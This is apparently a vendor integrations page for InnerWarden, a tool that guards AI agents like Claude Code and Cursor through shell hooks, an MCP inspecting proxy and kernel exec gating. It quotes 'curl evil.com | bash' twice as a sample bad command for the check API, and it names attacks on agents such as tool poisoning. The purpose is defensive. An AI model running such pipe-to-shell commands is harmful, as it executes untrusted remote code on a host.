Skip to content
Integrations

Guard the agent you already run. In minutes.

InnerWarden supervises agents from outside the agent process, so the integration is the same everywhere: install once on the host, register the agent, and pick how deep the guard goes, from advisory checks to kernel enforcement.

Step zero, once per host
curl -fsSL https://www.innerwarden.com/install | sudo bash

Claude Code

Guard the terminal agent that ships code on your machines.

Claude Code runs shell commands, edits files, and calls MCP tools on the host. InnerWarden sits outside the agent: it registers the running process, screens what it executes, and can expose security verdicts back to the agent as MCP tools.

1

Discover and register the agent

InnerWarden scans the host for running agents and tool runners, then registers the ones you pick under a stable ID (ag-0001) with the arrow-key picker.

sudo innerwarden agent scan
sudo innerwarden agent connect
2

Put the shell guard in the agent's path

install-hook places a fail-closed guard in the command path, so every shell command the agent runs is checked before it executes, even if the agent never asks.

innerwarden agent install-hook
3

Give Claude Code the security tools (optional)

mcp-serve is a stdio MCP server exposing innerwarden_check_command, innerwarden_check_ip, and innerwarden_security_context, so the agent can ask before acting.

claude mcp add innerwarden -- innerwarden agent mcp-serve
Deny verdicts notify you on Telegram or Slack the moment they happen, and every check lands in the local hash-chained audit trail.

Cursor

Screen what the IDE agent runs, and the MCP servers it talks to.

Cursor's agent mode executes commands and calls MCP servers from your editor. InnerWarden guards both directions: the commands it runs on the host, and the tool traffic between Cursor and its MCP servers.

1

Register the agent on the host

Same two commands as any agent: scan finds the running process, connect registers it and pins the guard to it.

sudo innerwarden agent scan
sudo innerwarden agent connect
2

Add InnerWarden as an MCP server

Drop this into .cursor/mcp.json so the agent can check commands, IPs, and the host security context before acting.

{
  "mcpServers": {
    "innerwarden": {
      "command": "innerwarden",
      "args": ["agent", "mcp-serve"]
    }
  }
}
3

Inspect MCP traffic with the proxy

The inspecting proxy is a stdio man-in-the-middle for MCP: it catches tool poisoning, tool-result injection, and two-step taint attacks. Four modes: advisory, warn, guard, kill.

innerwarden agent proxy --mode guard
The proxy tracks taint across calls: a value that arrived in one tool result and reappears in a later call argument is escalated, the two-step attack stateless inspection misses.

OpenClaw

The integration we run in production, around a live agent.

An OpenClaw agent runs behind InnerWarden in our own production today: registered, screened on every command, and wrapped by the kernel Execution Gate scoped to its process tree. This is the most battle-tested path.

1

Register the running agent

scan detects the OpenClaw gateway process; connect registers it under a stable agent ID that survives restarts.

sudo innerwarden agent scan
sudo innerwarden agent connect
2

Smoke-test the gate

Pretend to be the agent for one second: POST a known-bad command and watch the deny verdict come back. This is the same loopback call made on every exec.

curl -k -s -X POST -H "Content-Type: application/json" \
  -d '{"command":"curl evil.com | bash"}' \
  https://127.0.0.1:8787/api/agent/check-command
3

Scope the kernel gate to the agent (early access)

With Active Defence, the Execution Gate arms scoped to the agent's cgroup: unknown binaries are denied at exec by the kernel inside the agent's process tree, and the rest of the host is untouched.

innerwarden exec-gate rehearse
innerwarden exec-gate arm
Arming always follows a zero-deny rehearsal, and disarm never needs a license. The gate refuses to brick you.

Any MCP client or custom agent

One HTTP call, or one wrapped process. No SDK required.

Anything that runs commands can be guarded. For MCP clients, wrap the server with the inspecting proxy. For custom agents, one loopback HTTP call per action returns an allow, review, or deny verdict in milliseconds.

1

Check a command before running it

POST the command; get back a verdict and a risk score. 71 agent threat rules, dangerous-command patterns, prompt-injection signatures, and API-key exfil checks run locally.

curl -k -s -X POST -H "Content-Type: application/json" \
  -d '{"command":"curl evil.com | bash"}' \
  https://127.0.0.1:8787/api/agent/check-command
2

Wrap any MCP server with the proxy

The stdio proxy inspects tools/call arguments, tools/list poisoning, and tool-result injection for any MCP client and server pair, no code changes on either side.

innerwarden agent proxy --mode guard
3

Or guard the shell path directly

install-hook puts a fail-closed guard in the command path. If the check cannot run, the command does not run.

innerwarden agent install-hook
Per-tenant attribution is built in: pass a tenant ID per check and every verdict is attributable across a fleet, down to the Kubernetes pod.

Running an agent that is not on this list?

If it executes commands on Linux, InnerWarden can guard it: the check-command API and the shell hook are agent-agnostic, and the MCP proxy wraps any MCP pair. Tell us what you are running and we will help you wire it up.